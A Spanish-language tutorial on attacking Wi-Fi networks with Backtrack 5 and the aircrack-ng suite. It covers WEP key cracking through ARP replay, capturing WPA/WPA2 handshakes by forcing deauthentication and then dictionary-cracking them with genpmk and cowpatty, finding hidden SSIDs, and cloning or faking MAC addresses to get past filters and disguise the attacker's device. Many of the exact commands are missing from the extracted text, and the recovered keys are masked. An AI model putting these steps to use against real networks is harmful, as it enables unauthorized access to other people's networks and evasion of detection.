Vulnerabilidades WLAN WEP WPA WPA2
Vulnerabilidades WLAN WEP WPA WPA2
Vulnerabilidades WLAN WEP WPA WPA2
Vulnerabilidades WLAN(WEP/WPA/WPA2/PSK)
Antes de poner en prctica toda la informacin que contiene este manual, deberan pensar
cul es el motivo de su uso. Este manual ha sido creado con fines estrictamente educativos y los que
utilicen esta informacin para lograr objetivos que podran considerarse no muy ticos, asumirn
tanto la responsabilidad como las consecuencias de sus hechos.
Para poder aplicar toda esta informacin, se requiere un equipo dotado con una plataforma
Backtrack5. Este Sistema Operativo, se puede descargar accediendo a la pgina oficial de Backtrack
http://www.backtrack-linux.org/downloads/ . Es aconsejable instalar el sistema en el equipo, pero
como alternativa, o crear una maquina virtual y ejecutar el Backtrack a travs de la misma mquina
virtual.
Contando con el hecho de que la teora y la prctica son independientes, vamos a empezar con
la prctica intentando explicar y debatir, en paralelo, todo lo que implica esta parte.
Vamos a empezar abriendo la consola (terminal) Backtrack y creando una interfaz de
monitorizacin mon0. Para poder crear la interfaz de monitorizacin, vamos a introducir en la
consola Backtrack5 el comando airmon-ng start wlan0
root@bt:~# airmon-ng
Interface Chipset Driver
Tambin se puede comprobar introduciendo ifconfig. En el caso en el que se haya creado con xito,
la interfaz mon0 ser mostrada en la consola:
root@bt:~# ifconfig
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask 255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric 1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrer:0
Suponiendo que ya hemos activado una interfaz de monitorizacin mon 0, vamos a escanear
los alrededores para poder localizar un punto de acceso (AP-Access Point).
Para ello, introduciremos el comando airodump-ng mon0
Podemos ver que ya existe un cliente conectado al punto de acceso Romtelecom. Este mismo
cliente nos ayudara a obtener el volumen de datos (#Data) necesario para poder llevar a cabo el
proceso de crackeo.
A lo largo del tiempo, he observado muchos tutoriales dedicados a la explotacin de este tipo
de vulnerabilidades, pero a la vez, he observado que la mayora de los que publicaron los tutoriales
no aplicaron el mtodo de aceleracin del mismo proceso. Porque?
A continuacin, intentare explicar, en la medida de mis posibilidades, como aplicar este
proceso tan necesario e imprescindible. Digo imprescindible, porque el mtodo de aceleracin nos
ayudara a reducir el tiempo empleado de horas a minutos (5-10 minutos).
Iniciamos la captura de paquetes de datos ARP (ARP Packets) utilizando el comando aireplay-
ng. La misma utilidad, nos ayudara a reproducir e inyectar los paquetes capturados en la red,
obteniendo, de esta forma, el volumen de datos necesario para llevar a cabo el proceso de crackeo.
Cuntos ms paquetes ARP se capturen y se reproduzcan, ms aumentamos el flujo de datos en
la red, reduciendo de esta forma, el tiempo empleado. He de mencionar que el protocolo ARP, es un
protocolo que contiene un volumen de datos preestablecido e igual en todos los casos.
Utilizando esta informacin, vamos a poder reconocer y distinguir los paquetes ARP incluidos
en el trfico de datos de la red.
Mirando la consola en la que se est ejecutando airodump-ng vais a ver que el volumen de datos
esta aumentado, debido al proceso de aceleracin generado por la utilidad aireplay
CH11 ][ Elapsed : 3 min 25 s ][ Data/Ora ][ 140 bytes keystream 1C:1D:67:10:06:E5 ]
Opening crackromtelecom-01.cap
Reading packets, please wait
Los resultados mostrados en la consola sern mas o menos similares a los resultados que salen en la
imagen siguiente. Hemos decidido sustituir los valores reales por X por razones comprensibles.
Aircrack-ng 1.0
KB depth byte(vote)
0 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
1 0/ 1 XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256)
2 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256)
6 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512)
7 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
8 0/ 1 XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
9 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
10 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
11 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
12 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
Es muy probable que no obtengamos la contrasea (clave WEP) a la primera.
Aircrack-ng 1.0
KB depth byte(vote)
1 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
2 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256)
5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512)
6 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
No tenis porque preocuparos, normalmente, el proceso de crackeo puede llegar a durar horas,
y depende totalmente, del volumen de datos capturados y reinyectados en la red.
Pero, al haber invocando la utilidad <aireplay> vamos a reducir el tiempo empleado de horas a
minutos.
Analicemos la sintaxis Failed. Next try with 15000 IVs donde IV (Initialization Vector).
El proceso de crackeo se ha detenido porque todava no hemos logrado obtener el volumen de datos
necesario para el clculo de la clave WEP.
El mismo proceso se reiniciara en cuanto el numero de vectores de inicializacin alcance el valor
15000, porque, una vez activada la utilidad <aircrack>, la misma utilidad, est configurada para
reiniciar un proceso de clculo de la clave WEP cada 5000 IV.
En cuanto dispongamos de un numero de paquetes de datos suficiente, <aircrack> calculara la
clave WEP y la mostrara en la consola, tal y como veremos en la imagen siguiente.
Aircrack-ng 1.0
KB depth byte(vote)
0 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
1 0/ 1 XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256)
2 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
3 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
4 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
5 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 512) XX( 256) XX( 256)
6 0/ 1 XX( 512) XX( 256) XX( 256) XX( 512) XX( 256) XX( 256) XX( 512)
7 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
8 0/ 1 XX( 256) XX( 512) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
9 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
10 0/ 1 XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256) XX( 256)
11 0/ 1 XX( 768) XX( 512) XX( 512) XX( 512) XX( 256) XX( 256) XX( 512)
12 0/ 1 XX( 512) XX( 256) XX( 256) XX( 256) XX( 512) XX( 256) XX( 512)
Para poder descifrar (crackear) la clave WEP de un punto de acceso, en nuestro caso
Romtelecom, lo nico que necesitaremos, es capturar, reproducir (simular) y reinyectar un nmero
suficiente de paquetes de datos.
Una contrasea WEP se puede calcular sin que importe el nmero de caracteres o la complexidad
de la misma.
Criptado WPA/WPA2 y el mtodo de crackeo:
WPA es un protocolo de seguridad que utiliza como algoritmo de cifrado el TKIP (Temporal Key
Integrity Protocol). Hemos de mencionar que tanto el protocolo WEP como el WPA utilizan el mismo
Algoritmo de cifrado para encriptar los paquetes de datos, con la nica diferencia, que el WPA
genera las claves de otra manera.
WPA2 fue diseado para mejorar la versin WPA, utilizando como algoritmo de cifrado el AES
(Advanced Encryption Standard). Tal y como veremos a continuacin, tanto el protocolo WPA como
el WPA2, son vulnerables a un ataque de diccionario.
Para poder llevar a cabo con xito un ataque a WPA/WPA2 vamos a necesitar dos factores:
1. Un diccionario bien definido que contenga frases especificas de la zona geogrfica (pais) en la
que os encontris.
2. El segundo factor consta en capturar un saludo de 4 vas (WPA Handshake).
PTK (Paiwise Transition Keys) es una clave de cifrado que se utiliza en el proceso WPA y se obtiene
concatenando los siguientes factores:
Antes de empezar el proceso de crackeo, hemos de saber que, tanto el procedimiento como los
pasos que tenemos que seguir para obtener la clave, serian los mismos sin importar de que
protocolo se tratase (WPA/WPA2).
Suponiendo que ya hemos configurado el punto de acceso Romtelecom para que aplicase una
proteccin WPA, vamos a abrir una consola e introduciremos la orden siguiente:
Como habamos dicho, para poder iniciar un ataque a diccionario, necesitaremos capturar el
saludo a 4 vas que se efecta entre un cliente y el punto de acceso. Este saludo se realiza en el
momento en el que el cliente intenta conectarse al punto de acceso.
Para ello tendramos que coincidir con un cliente o simplemente obligar a los clientes que ya
estn conectados al punto de acceso Romtelecom, a desconectarse y as capturar el saludo a 4 vas
que realizara al volver a conectarse al punto de acceso. Para ello vamos a efectuar un ataque de
autenticacin (DOS) siguiendo 2 pasos:
En cuanto el cliente intentara conectarse, al haber sido obligado a desconectarse tras el ataque de
de autenticacin DOS, la utilidad <airodump> que ya se esta ejecutando, capturara el saludo a 4
vas.
Una vez obtenido el saludo a 4 vas, WPA Handshake 1C:1D:67:10:06:E5 iremos a la consola
en la que se est ejecutando la utilidad <airodump> e interrumpiremos el proceso pulsando Ctrl-C.
Aircrack-ng 1.0
Master Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
Transient Key: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
EAPOL HMAC: XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX XX
Una vez calculada la clave, la misma clave se mostrara en la consola KEY FOUND! [XXXXXXXXX]
A continuacin debatiremos el mtodo de aceleracin del proceso de crackeo:
Para poder acelerar el proceso de crackeo WPA y a la vez reducir el tiempo empleado vamos a
tener que calcular el valor del factor PMK (Pairwise Master Key) o PSK (Pre-shared key) es decir, la
clave precompartida. El factor PMK (PSK) se obtiene concatenando otros dos factores importantes:
Para ello utilizaremos un generador PMK llamado genpmk abriendo una consola e introduciendo
el comando:
Puesto que ya tenemos la PMK, vamos a extraer la contrasea WIFI ejecutando la utilidad cowpatty.
Para ello introducimos el comando:
Vamos a ver lo fcil que es descubrir un punto de acceso invisible (Hidden SSID)
Para ello vamos a tener que ejecutar la utilidad <airodump>.
El filtrado MAC es una medida de seguridad que cuenta con un listado que contiene las
direcciones MAC de los clientes autorizados.
Todos los dems dispositivos, cuyas direcciones MAC no estn incluidas en el listado de filtrado
MAC, gestionado por el administrador de red, no obtendrn la autorizacin para poder conectarse al
punto de acceso.
A continuacin vamos a ver lo fcil que es engaar los filtros MAC, clonando la direccin MAC de
un cliente autorizado.
En nuestro caso utilizaremos un punto de acceso con ESSID Romtelecom y cuya direccin MAC
sera 1C:1D:67:10:06:E5:
Donde:
2. Cambiamos la direccin MAC de nuestro dispositivo por la direccin MAC del cliente
autorizado:
ifconfig wlan0 up
NOTA:
Tal y como habis visto, la direccin MAC de vuestro dispositivo inalmbrico se puede cambiar
sin problema alguno.
Digamos que vuestro dispositivo inalmbrico es un dispositivo fabricado por CISCO y a la hora
de efectuar un ataque queris que conste que estis utilizando un dispositivo fabricado, por ejemplo
por INTEL o cualquier otro fabricante.
En una consola ejecutad el comando:
macchanger list
Veris que en la misma consola se mostrara un listado con la mayora de los fabricantes y que a
la vez contiene la huella MAC del mismo. Por ejemplo la huella MAC de INTEL es 00:90:27.
Para cambiar la direccin MAC de CISCO por una de INTEL introducid:
Charles Bukowski
mihaivalentindumitru@gmail.com